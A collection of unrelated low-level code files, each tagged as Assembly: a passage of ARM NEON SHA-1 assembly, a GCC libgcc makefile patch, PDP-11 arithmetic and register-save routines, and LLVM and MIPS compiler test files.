add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q1,q2,#8
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r7
add r4,r4,r5,ror#27
veor q3,q3,q8
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q2,q14
eor r10,r5,r7
add r3,r3,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r6
vshr.u32 q3,q12,#30
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vst1.32 {q13},[r12,:128]!
add r3,r3,r11
eor r10,r4,r6
vsli.32 q3,q12,#2
add r7,r7,r9
ldr r9,[sp,#60]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#0]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q2,q3,#8
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#4]
veor q8,q8,q0
eor r11,r10,r3
add r5,r5,r6,ror#27
veor q8,q8,q9
mov r7,r7,ror#2
add r5,r5,r11
vadd.i32 q13,q3,q14
eor r10,r6,r3
add r4,r4,r9
veor q12,q12,q8
ldr r9,[sp,#8]
eor r11,r10,r7
vshr.u32 q8,q12,#30
add r4,r4,r5,ror#27
mov r6,r6,ror#2
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
add r4,r4,r11
eor r10,r5,r7
vsli.32 q8,q12,#2
add r3,r3,r9
ldr r9,[sp,#12]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#16]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q3,q8,#8
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#20]
veor q9,q9,q1
eor r11,r10,r4
add r6,r6,r7,ror#27
veor q9,q9,q10
mov r3,r3,ror#2
add r6,r6,r11
vadd.i32 q13,q8,q14
eor r10,r7,r4
add r5,r5,r9
veor q12,q12,q9
ldr r9,[sp,#24]
eor r11,r10,r3
vshr.u32 q9,q12,#30
add r5,r5,r6,ror#27
mov r7,r7,ror#2
vst1.32 {q13},[r12,:128]!
add r5,r5,r11
eor r10,r6,r3
vsli.32 q9,q12,#2
add r4,r4,r9
ldr r9,[sp,#28]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#32]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q8,q9,#8
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#36]
veor q10,q10,q2
add r7,r7,r3,ror#27
eor r11,r5,r6
veor q10,q10,q11
add r7,r7,r10
and r11,r11,r4
vadd.i32 q13,q9,q14
mov r4,r4,ror#2
add r7,r7,r11
veor q12,q12,q10
add r6,r6,r9
and r10,r4,r5
vshr.u32 q10,q12,#30
ldr r9,[sp,#40]
add r6,r6,r7,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r4,r5
add r6,r6,r10
vsli.32 q10,q12,#2
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#44]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#48]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
vext.8 q12,q9,q10,#8
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#52]
veor q11,q11,q3
add r3,r3,r4,ror#27
eor r11,r6,r7
veor q11,q11,q0
add r3,r3,r10
and r11,r11,r5
vadd.i32 q13,q10,q14
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
veor q12,q12,q11
add r7,r7,r9
and r10,r5,r6
vshr.u32 q11,q12,#30
ldr r9,[sp,#56]
add r7,r7,r3,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r5,r6
add r7,r7,r10
vsli.32 q11,q12,#2
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#60]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#0]
add r5,r5,r6,ror#27
eor r11,r3,r4
add r5,r5,r10
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
vext.8 q12,q10,q11,#8
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#4]
veor q0,q0,q8
add r4,r4,r5,ror#27
eor r11,r7,r3
veor q0,q0,q1
add r4,r4,r10
and r11,r11,r6
vadd.i32 q13,q11,q14
mov r6,r6,ror#2
add r4,r4,r11
veor q12,q12,q0
add r3,r3,r9
and r10,r6,r7
vshr.u32 q0,q12,#30
ldr r9,[sp,#8]
add r3,r3,r4,ror#27
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
eor r11,r6,r7
add r3,r3,r10
vsli.32 q0,q12,#2
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#12]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#16]
add r6,r6,r7,ror#27
eor r11,r4,r5
add r6,r6,r10
and r11,r11,r3
mov r3,r3,ror#2
add r6,r6,r11
vext.8 q12,q11,q0,#8
add r5,r5,r9
and r10,r3,r4
ldr r9,[sp,#20]
veor q1,q1,q9
add r5,r5,r6,ror#27
eor r11,r3,r4
veor q1,q1,q2
add r5,r5,r10
and r11,r11,r7
vadd.i32 q13,q0,q14
mov r7,r7,ror#2
add r5,r5,r11
veor q12,q12,q1
add r4,r4,r9
and r10,r7,r3
vshr.u32 q1,q12,#30
ldr r9,[sp,#24]
add r4,r4,r5,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r7,r3
add r4,r4,r10
vsli.32 q1,q12,#2
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#28]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
add r7,r7,r9
and r10,r5,r6
ldr r9,[sp,#32]
add r7,r7,r3,ror#27
eor r11,r5,r6
add r7,r7,r10
and r11,r11,r4
mov r4,r4,ror#2
add r7,r7,r11
vext.8 q12,q0,q1,#8
add r6,r6,r9
and r10,r4,r5
ldr r9,[sp,#36]
veor q2,q2,q10
add r6,r6,r7,ror#27
eor r11,r4,r5
veor q2,q2,q3
add r6,r6,r10
and r11,r11,r3
vadd.i32 q13,q1,q14
mov r3,r3,ror#2
add r6,r6,r11
veor q12,q12,q2
add r5,r5,r9
and r10,r3,r4
vshr.u32 q2,q12,#30
ldr r9,[sp,#40]
add r5,r5,r6,ror#27
vst1.32 {q13},[r12,:128]!
eor r11,r3,r4
add r5,r5,r10
vsli.32 q2,q12,#2
and r11,r11,r7
mov r7,r7,ror#2
add r5,r5,r11
add r4,r4,r9
and r10,r7,r3
ldr r9,[sp,#44]
add r4,r4,r5,ror#27
eor r11,r7,r3
add r4,r4,r10
and r11,r11,r6
mov r6,r6,ror#2
add r4,r4,r11
add r3,r3,r9
and r10,r6,r7
ldr r9,[sp,#48]
add r3,r3,r4,ror#27
eor r11,r6,r7
add r3,r3,r10
and r11,r11,r5
mov r5,r5,ror#2
add r3,r3,r11
vext.8 q12,q1,q2,#8
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#52]
veor q3,q3,q11
eor r11,r10,r5
add r7,r7,r3,ror#27
veor q3,q3,q8
mov r4,r4,ror#2
add r7,r7,r11
vadd.i32 q13,q2,q14
eor r10,r3,r5
add r6,r6,r9
veor q12,q12,q3
ldr r9,[sp,#56]
eor r11,r10,r4
vshr.u32 q3,q12,#30
add r6,r6,r7,ror#27
mov r3,r3,ror#2
vst1.32 {q13},[r12,:128]!
add r6,r6,r11
eor r10,r7,r4
vsli.32 q3,q12,#2
add r5,r5,r9
ldr r9,[sp,#60]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#0]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
vadd.i32 q13,q3,q14
eor r10,r5,r7
add r3,r3,r9
vst1.32 {q13},[r12,:128]!
sub r12,r12,#64
@ If this was the last block (r1 == r2) rewind r1 so the preloads
@ below stay in bounds; otherwise start prefetching the next block.
teq r1,r2
sub r8,r8,#16
it eq
subeq r1,r1,#64
vld1.8 {q0,q1},[r1]!
ldr r9,[sp,#4]
eor r11,r10,r6
vld1.8 {q2,q3},[r1]!
add r3,r3,r4,ror#27
mov r5,r5,ror#2
vld1.32 {d28[],d29[]},[r8,:32]!
add r3,r3,r11
eor r10,r4,r6
vrev32.8 q0,q0
add r7,r7,r9
ldr r9,[sp,#8]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#12]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#16]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
vrev32.8 q1,q1
eor r10,r6,r3
add r4,r4,r9
vadd.i32 q8,q0,q14
ldr r9,[sp,#20]
eor r11,r10,r7
vst1.32 {q8},[r12,:128]!
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#24]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#28]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
eor r10,r3,r5
add r6,r6,r9
ldr r9,[sp,#32]
eor r11,r10,r4
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
vrev32.8 q2,q2
eor r10,r7,r4
add r5,r5,r9
vadd.i32 q9,q1,q14
ldr r9,[sp,#36]
eor r11,r10,r3
vst1.32 {q9},[r12,:128]!
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#40]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
ldr r9,[sp,#44]
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
eor r10,r4,r6
add r7,r7,r9
ldr r9,[sp,#48]
eor r11,r10,r5
add r7,r7,r3,ror#27
mov r4,r4,ror#2
add r7,r7,r11
vrev32.8 q3,q3
eor r10,r3,r5
add r6,r6,r9
vadd.i32 q10,q2,q14
ldr r9,[sp,#52]
eor r11,r10,r4
vst1.32 {q10},[r12,:128]!
add r6,r6,r7,ror#27
mov r3,r3,ror#2
add r6,r6,r11
eor r10,r7,r4
add r5,r5,r9
ldr r9,[sp,#56]
eor r11,r10,r3
add r5,r5,r6,ror#27
mov r7,r7,ror#2
add r5,r5,r11
eor r10,r6,r3
add r4,r4,r9
ldr r9,[sp,#60]
eor r11,r10,r7
add r4,r4,r5,ror#27
mov r6,r6,ror#2
add r4,r4,r11
eor r10,r5,r7
add r3,r3,r9
eor r11,r10,r6
add r3,r3,r4,ror#27
mov r5,r5,ror#2
add r3,r3,r11
@ Fold working variables back into the context; on the last block
@ restore the saved sp (r14), otherwise keep looping.
ldmia r0,{r9,r10,r11,r12} @ accumulate context
add r3,r3,r9
ldr r9,[r0,#16]
add r4,r4,r10
add r5,r5,r11
add r6,r6,r12
it eq
moveq sp,r14
add r7,r7,r9
it ne
ldrne r9,[sp]
stmia r0,{r3,r4,r5,r6,r7}
itt ne
addne r12,sp,#3*16
bne .Loop_neon
@ vldmia sp!,{d8-d15}
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size sha1_block_data_order_neon,.-sha1_block_data_order_neon
#endif
| {
"language": "Assembly"
} |
--- libgcc/config/t-hardfp-sf.orig 2019-06-06 21:40:23 UTC
+++ libgcc/config/t-hardfp-sf
@@ -0,0 +1,32 @@
+# Copyright (C) 2014 Free Software Foundation, Inc.
+
+# This file is part of GCC.
+
+# GCC is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 3, or (at your option)
+# any later version.
+
+# GCC is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with GCC; see the file COPYING3. If not see
+# <http://www.gnu.org/licenses/>.
+
+hardfp_float_modes := sf
+# di and ti are provided by libgcc2.c where needed.
+hardfp_int_modes := si
+hardfp_extensions :=
+hardfp_truncations :=
+
+# Emulate 64 bit float:
+FPBIT = true
+DPBIT = true
+# Don't build functions handled by 32 bit hardware:
+LIB2FUNCS_EXCLUDE = _addsub_sf _mul_sf _div_sf \
+ _fpcmp_parts_sf _compare_sf _eq_sf _ne_sf _gt_sf _ge_sf \
+ _lt_sf _le_sf _unord_sf _si_to_sf _sf_to_si _negate_sf \
+ _thenan_sf _sf_to_usi _usi_to_sf
| {
"language": "Assembly"
} |
; STUFF - Very basic useful stuff -*-PALX-*-
stvn==%fnam2
.sbttl Register save/restore routines
; SAVE6 routine saves R0 through R5 on stack, R0 at top:
; SP -> R0
; R1
; R2
; R3
; R4
; R5
; Call by JSR R5,SAVE6. Restore regs by REST6 routine.
; (JSR R5 pushes the caller's R5 and leaves the return address in R5,
; so JMP (R5) resumes the caller; the old R5 sits just below R4.)
save6: push r4,r3,r2,r1,r0 ; R5 already on stack by JSR.
jmp (r5) ; return.
; REST6 routine restores R0 through R5 from stack, where
; R0 is considered to be the top word of the stack (which is
; how SAVE6 pushes the registers). Call by JSR R5,REST6.
; REST6 returns with the 6 words popped off the stack.
; (The JSR into REST6 pushed the current R5; that word is discarded.
; RTS R5 then both returns and pops the caller's saved R5.)
rest6: tst (sp)+ ; forget old R5 contents.
pop r0,r1,r2,r3,r4 ; restore other regs.
rts r5 ; return and restore R5.
.sbttl Multiply & Divide
.if eq eis
; MUL1 multiplies two integers, producing a single precision product. Both the
; multiplicand and multiplier are treated as signed numbers. This routine is
; meant to be compatible with the single precision multiply instruction found
; on reasonable PDP11s.
; Classic shift-and-add: tests multiplier bits from the low end while
; doubling the multiplicand. Stack offsets are octal (10(sp) = 8.),
; as witnessed by the decimal-point notation (#16.) used elsewhere.
; ARGS: VALS:
; SP -> A SP -> P
; B
mul1: push r1,r2 ; save regs
mov 6(sp),r1 ; multiplicand
mov 10(sp),r2 ; multiplier
clr 10(sp) ; clear product accumulator (reuses arg slot)
loop < ror r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r1,10(sp) ; if bit is 1 then add multiplicand to product
>
asl r1 ; double multiplicand
clc ; so ROR is logical shift
rptl ; and repeat.
>
if cs,<
add r1,10(sp) ; one last add necessary if low bit was 1
>
pop r2,r1,(sp) ; restore regs, remove arg2 from stack
rts r5
; MUL2 multiplies two integers producing a double precision product. Both
; the multiplicand and multiplier are treated as signed numbers. This routine
; is meant to be compatible with the double precision multiply instruction
; found on reasonable PDP11s.
; Operands are sign-normalized first (both negated when the multiplier is
; negative) so the shift-and-add loop can run on the magnitudes; the
; product accumulates in the two argument slots on the stack.
; ARGS: VALS:
; SP -> multiplicand SP -> P hi
; multiplier P lo
mul2: push r0,r1,r2 ; save regs
clr r0 ; multiplicand
mov 10(sp),r1 ; ... (low word; MOV sets N from the value)
if mi,<
com r0 ; if low part negative set high part to -1
>
mov 12(sp),r2 ; multiplier
if mi,<
neg r2 ; negate multiplier and multiplicand
neg r0 ; double word negate
neg r1 ; ...
sbc r0 ; ...
>
clr 10(sp) ; clear product accumulator
clr 12(sp) ; ...
loop < asr r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r1,12(sp) ; if bit is 1 then add multiplicand to product
adc 10(sp) ; ... (propagate carry into high word)
add r0,10(sp) ; ...
>
asl r1 ; double multiplicand
rol r0 ; ... (32-bit left shift across r0:r1)
rptl
>
if cs,<
add r1,12(sp) ; one last add necessary if low bit was 1
adc 10(sp) ; ...
add r0,10(sp)
>
pop r2,r1,r0 ; restore regs
rts r5
; DIV2 divides a double word quantity by a single word quantity yielding a
; quotient and remainder. It is meant to simulate the DIV instruction found
; on reasonable 11s.
; Restoring shift-subtract division, 16. iterations; the quotient builds
; up in R3, the remainder ends in R0. NOTE(review): only the divisor side
; is sign-normalized here (divisor and dividend negated when the divisor
; is negative) -- verify the intended signed semantics against callers.
; ARGS: VALS:
; SP -> divisor SP -> remainder
; dividend lo quotient
; dividend hi
div2: jsr r5,save6 ; save regs
mov 22(sp),r0 ; dividend hi (octal offsets, past the 7 saved words)
mov 20(sp),r1 ; dividend lo
mov 16(sp),r2 ; divisor
if mi,<
neg r2 ; negate divisor and dividend
neg r0 ; double word negate
neg r1 ; ...
sbc r0 ; ...
>
clr r3 ; quotient accumulator
mov #16.,r4 ; 16 decimal iterations, one per quotient bit
loop < asl r3 ; quotient <<= 1
rol r1 ; shift dividend left into r0
rol r0 ; ...
cmp r2,r0 ; does divisor fit?
if le,<
sub r2,r0 ; yes: subtract
inc r3 ; and set quotient bit
>
sorl r4 ; loop 16. times
>
mov r3,22(sp) ; quotient into (deeper) arg slot
mov r0,20(sp) ; remainder into the slot above it
jsr r5,rest6
pop (sp) ; drop divisor; SP -> remainder, quotient
rts r5
.endc ; eq eis
; DMUL performs double precision multiplication. Both multiplicand and
; multiplier are treated as unsigned integers. This routine is necessary
; because the PDP11 multiply instruction is too crufty for some things.
; Unsigned shift-and-add over a 16-bit multiplier with a 32-bit
; multiplicand; result is the low 32 bits of the product.
; ARGS: VALS:
; R0,R1: multiplicand R0,R1: product
; R2: multiplier (destroyed)
dmul: push r3,r4 ; save regs
mov r0,r3 ; copy multiplicand
mov r1,r4 ; ...
clr r0 ; clear product accumulator
clr r1 ; ...
loop < clc ; clear carry so ROR is logical shift
ror r2 ; divide multiplier by 2, testing lowest bit
exitl eq ; nothing left
if cs,<
add r4,r1 ; if bit is 1 then add multiplicand to product
adc r0 ; ... (carry into high word)
add r3,r0 ; ...
>
asl r4 ; double multiplicand
rol r3 ; ... (32-bit left shift across r3:r4)
rptl
>
if cs,<
add r4,r1 ; one last add necessary if low bit was 1
adc r0 ; ...
add r3,r0 ; ...
>
pop r4,r3 ; restore regs
rts r5
; DDIV performs double precision division. It is best suited to dividing
; double precision no.s by some constant. Both dividend and divisor are
; treated as unsigned integers. This routine is necessary because the PDP11
; divide instruction is too crufty for just about anything.
; Non-restoring-style loop over a pre-normalized divisor: each pass
; compares the shifted divisor (r2,r3) against the dividend, subtracts
; when it fits and ORs the matching quotient bit (r4,r5) into the
; quotient being built on the stack, then shifts divisor and bit right
; until the bit falls off the end.
; ARGS: VALS:
; R0,R1: dividend R0,R1: quotient
; R2,R3: divisor normalized R2: remainder
; R4,R5: 1 shifted same
; Note: DDIV is called by JSR PC,DDIV.
ddiv: clr -(sp) ; start quotient at 0
clr -(sp) ; ... (two words: hi at 2(sp), lo at (sp))
loop < cmp r2,r0 ; divisor hi vs dividend hi
blo 1$ ; divisor hi strictly lower: it fits, subtract
if eq,<
cmp r3,r1 ; hi words equal: decide on the low words
if los,<
1$: sub r3,r1 ; subtract from dividend
sbc r0 ; (borrow into high word)
sub r2,r0
bis r4,2(sp) ; set this quotient bit (hi word)
bis r5,(sp) ; ... (lo word)
>
>
clc ; logical 32-bit right shift of divisor
ror r2
ror r3
asr r4 ; shift quotient bit right in step
ror r5
rptl ne ; continue while a bit remains in r5...
tst r4
rptl ne ; ...or in r4
>
mov r1,r2 ; put remainder in r2
pop r1,r0 ; put quotient in r0,r1
rts pc
; DDIV10 divides r0,r1 by 10, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV10.
; 120000 octal = 10. shifted left 12; 10000 octal = 1 shifted left 12.
ddiv10: mov #120000,r2 ; 10 normalized
clr r3 ; ...
mov #10000,r4 ; 1 shifted same amount as 10
clr r5 ; ...
jmp ddiv ; jump to common double precision divide
; DDIV24 divides r0,r1 by 24, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV24.
; 140000 octal = 24. shifted left 11; 4000 octal = 1 shifted left 11.
ddiv24: mov #140000,r2 ; 24 normalized
clr r3 ; ...
mov #4000,r4 ; 1 shifted same amount as 24
clr r5 ; ...
jmp ddiv ; call common double precision divide
; DDIV60 divides r0,r1 by 60, remainder in r2. Clobbers r3, r4, and r5.
; Call with JSR PC,DDIV60.
; 170000 octal = 60. shifted left 10; 2000 octal = 1 shifted left 10.
ddiv60: mov #170000,r2 ; 60 normalized
clr r3 ; ...
mov #2000,r4 ; 1 shifted same amount as 60
clr r5 ; ...
jmp ddiv ; call common double precision divide
.sbttl random things
; Single-bit masks: bits[n] = 1 << n (values are octal).
bits: .byte 1,2,4,10,20,40,100,200
.if ne ndz
ifMIT <
; DZ11 line parameters
; 10000=Reciever clock on
; 7400=speed, 4 bits: low order bits
; 00 01 10 11
; ----------------------
; high 00| 50 75 110 134.5
; order 01| 150 300 600 1200
; bits 10| 1800 2000 2400 3600
; 11| 4800 7200 9600 19.2K
; 200=odd parity
; 100=parity enabled
; 40=stop code (on is 2 stop bits)
; 30=character length, excluding parity, 00=5,01=6,10=7,11=8
; 7=line number
; NOTE(review): the "line N" text on the 17123/13524/13525 entries does
; not match the low-3-bit line field of those values (3/4/5) -- verify
; which of the two is the intended wiring before relying on either.
dzlpar: 17120 ; line 0: 9600 baud, even parity, 7 bits (SB)
17121 ; line 1: 9600 baud, even parity, 7 bits (VT52 #1)
17122 ; line 2: 9600 baud, even parity, 7 bits (VT52 #2)
17123 ; line 5: 9600 baud, even parity, 7 bits (VT52 #3)
13524 ; line 3: 1200 baud, even parity, 7 bits (HP2645)
13525 ; line 4: 1200 baud, even parity, 7 bits (Vadic 1200)
15036 ; line 6: 2400 baud, no parity, 8 bits (HP3000)
17037 ; line 7: 9600 baud, no parity, 8 bits (MC)
>
.endc ; if DZ
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt %s -instcombine -S | FileCheck %s
declare void @llvm.assume(i1)
declare i8 @gen8()
declare void @use8(i8)
; Fold: "(base - offset) u< base" -> "base u>= offset".  Valid here because
; the assume makes offset s< 0, hence offset != 0 (the sub underflow test).
define i1 @t0(i8 %base, i8 %offset) {
; CHECK-LABEL: @t0(
; CHECK-NEXT:    [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT:    call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp uge i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %cmp = icmp slt i8 %offset, 0
  call void @llvm.assume(i1 %cmp)
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp ult i8 %adjusted, %base
  ret i1 %res
}
; Inverse predicate of @t0: "(base - offset) u>= base" -> "base u< offset",
; again relying on assume(offset s< 0) to establish offset != 0.
define i1 @t1(i8 %base, i8 %offset) {
; CHECK-LABEL: @t1(
; CHECK-NEXT:    [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT:    call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp ult i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %cmp = icmp slt i8 %offset, 0
  call void @llvm.assume(i1 %cmp)
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp uge i8 %adjusted, %base
  ret i1 %res
}
; Commuted form of @t0 ("base u> (base - offset)"); %base comes from a call
; so the fold must handle the non-argument operand order as well.
define i1 @t2(i8 %offset) {
; CHECK-LABEL: @t2(
; CHECK-NEXT:    [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT:    call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT:    [[BASE:%.*]] = call i8 @gen8()
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp uge i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %cmp = icmp slt i8 %offset, 0
  call void @llvm.assume(i1 %cmp)
  %base = call i8 @gen8()
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp ugt i8 %base, %adjusted
  ret i1 %res
}
; Commuted inverse form ("base u<= (base - offset)") -> "base u< offset".
define i1 @t3(i8 %offset) {
; CHECK-LABEL: @t3(
; CHECK-NEXT:    [[CMP:%.*]] = icmp slt i8 [[OFFSET:%.*]], 0
; CHECK-NEXT:    call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT:    [[BASE:%.*]] = call i8 @gen8()
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp ult i8 [[BASE]], [[OFFSET]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %cmp = icmp slt i8 %offset, 0
  call void @llvm.assume(i1 %cmp)
  %base = call i8 @gen8()
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp ule i8 %base, %adjusted
  ret i1 %res
}
; Here we don't know that offset is non-zero. Can't fold.
; (Negative test: with no assume, offset may be 0, where "base - 0 u< base"
; is false but "base u>= 0" is true -- the CHECK lines pin the icmp intact.)
define i1 @n4_maybezero(i8 %base, i8 %offset) {
; CHECK-LABEL: @n4_maybezero(
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE:%.*]], [[OFFSET:%.*]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp ult i8 [[ADJUSTED]], [[BASE]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp ult i8 %adjusted, %base
  ret i1 %res
}
; We need to know that about %offset; knowing it about %base won't do.
; Can't fold.  (Negative test: the assume constrains the wrong operand.)
define i1 @n5_wrongnonzero(i8 %base, i8 %offset) {
; CHECK-LABEL: @n5_wrongnonzero(
; CHECK-NEXT:    [[CMP:%.*]] = icmp sgt i8 [[BASE:%.*]], 0
; CHECK-NEXT:    call void @llvm.assume(i1 [[CMP]])
; CHECK-NEXT:    [[ADJUSTED:%.*]] = sub i8 [[BASE]], [[OFFSET:%.*]]
; CHECK-NEXT:    call void @use8(i8 [[ADJUSTED]])
; CHECK-NEXT:    [[RES:%.*]] = icmp ult i8 [[ADJUSTED]], [[BASE]]
; CHECK-NEXT:    ret i1 [[RES]]
;
  %cmp = icmp sgt i8 %base, 0
  call void @llvm.assume(i1 %cmp)
  %adjusted = sub i8 %base, %offset
  call void @use8(i8 %adjusted)
  %res = icmp ult i8 %adjusted, %base
  ret i1 %res
}
| {
"language": "Assembly"
} |
# Check that .sdata and .sbss sections have SHF_MIPS_GPREL flags
# and proper section types.
# RUN: llvm-mc -filetype=obj -triple=mips-unknown-linux %s -o - \
# RUN:   | llvm-readobj -s | FileCheck %s

# One word of initialized data forces .sdata to be emitted...
  .sdata
  .word 0
# ...and four zero bytes force .sbss (note SHT_NOBITS below: no file contents).
  .sbss
  .zero 4

# CHECK:      Name: .sdata
# CHECK-NEXT: Type: SHT_PROGBITS
# CHECK-NEXT: Flags [ (0x10000003)
# CHECK-NEXT:   SHF_ALLOC
# CHECK-NEXT:   SHF_MIPS_GPREL
# CHECK-NEXT:   SHF_WRITE
# CHECK-NEXT: ]
# CHECK:      Name: .sbss
# CHECK-NEXT: Type: SHT_NOBITS
# CHECK-NEXT: Flags [ (0x10000003)
# CHECK-NEXT:   SHF_ALLOC
# CHECK-NEXT:   SHF_MIPS_GPREL
# CHECK-NEXT:   SHF_WRITE
# CHECK-NEXT: ]
| {
"language": "Assembly"
} |
/*
